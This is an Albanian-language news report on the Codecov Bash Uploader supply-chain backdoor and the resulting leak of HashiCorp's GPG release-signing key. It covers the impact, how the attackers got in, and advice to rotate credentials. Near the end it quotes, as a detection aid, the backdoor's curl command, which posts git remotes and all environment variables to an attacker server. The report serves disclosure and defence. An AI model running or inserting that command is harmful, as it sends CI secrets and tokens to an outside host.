Injekti i kodit të keq në skriptin Codecov çoi në komprometimin e çelësit PGP të HashiCorp

Kompania HashiCorp, e njohur për zhvillimin e mjeteve të hapura Vagrant, Packer, Nomad dhe Terraform, njoftoi për një rrjedhje të çelësit të saj të mbyllur GPG, i përdorur për krijimin e nënshkrimeve digjitale që verifikojnë lëshimet. Sulmuesit që arritën të fitonin akses në çelësin GPG, potencialisht mund të bënin ndryshime të fshehta në produktet e HashiCorp, duke i nënshkruar ato me një nënshkrim digjital të saktë. Megjithatë, kompania deklaroi se gjatë auditit të kryer nuk u gjetën prova të përpjekjeve për të bërë të tilla modifikime.

Aktualisht, çelësi GPG i komprometuar është tërhequr dhe në vend të tij është futur një çelës i ri. Problemi preku vetëm verifikimin përmes skedarëve SHA256SUM dhe SHA256SUM.sig, dhe nuk preku krijimin e nënshkrimeve digjitale për paketat Linux DEB dhe RPM, të shpërndara përmes releases.hashicorp.com, dhe mekanizmat e konfirmimit për lëshimet në macOS dhe Windows (AuthentiCode).

Rrjedhja ndodhi për shkak të përdorimit në infrastrukturë të skriptit Codecov Bash Uploader (codecov-bash), i destinuar për të ngarkuar raportet e mbulimit nga sistemet e integrimit të vazhdueshëm. Gjatë një sulmi ndaj kompanisë Codecov, në skriptin e caktuar u fut një backdoor i fshehur, përmes të cilit u organizua dërgimi i fjalëkalimeve dhe çelësave të enkriptimit në server sulmuesve.

Për të hakuar, sulmuesit përdorën një gabim në procesin e krijimit të imazhit Docker të Codecov, i cili lejonte nxjerrjen e të dhënave të aksesit në GCS (Google Cloud Storage), të nevojshme për të bërë ndryshime në skriptin Bash Uploader, i cili shpërndahej nga faqja codecov.io. Ndryshimet u bënë më 31 janar, dy muaj mbetën të panjohura dhe lejuan sulmuesit të nxjerrin informacion, që ruhej në mjediset e sistemeve të integrimit të vazhdueshëm të klientëve. Me anë të kodit të keq të shtuar, sulmuesit mund të merrnin informacionin rreth repo-ëve të testuar Git dhe të gjitha variablave të mjedisit, përfshirë ato që përfshinin tokene, çelësa enkriptimi dhe fjalëkalime, të dërguara në sistemet e integrimit të vazhdueshëm për të organizuar qasje në kodin e aplikacioneve, depot dhe shërbime, si Amazon Web Services dhe GitHub.

Përveç thirrjes direkte, skripti Codecov Bash Uploader u përdor si pjesë e ngarkuesve të tjerë, si Codecov-action (Github), Codecov-circleci-orb dhe Codecov-bitrise-step, përdoruesit e të cilëve gjithashtu janë të prekur nga problemi. Të gjithë përdoruesve të codecov-bash dhe produkteve të lidhura u rekomandohet të kryejnë një auditim të infrastrukturave të tyre, si dhe të ndryshojnë fjalëkalimet dhe çelësat e enkriptimit. Të kontrollojnë praninë e backdoor-it në skript mund të bëhet nga prania e varsës në të "curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://<IP-e-serverit-te-sulmuesve>/upload/v2 || true

Burimi: opennet.ru

Bleni hostim tĂ« besueshĂ«m pĂ«r faqe me mbrojtje nga DDoS, serverĂ« VPS VDS đŸ”„ Bleni hostim tĂ« besueshĂ«m pĂ«r faqe me mbrojtje nga DDoS, serverĂ« VPS VDS | ProHoster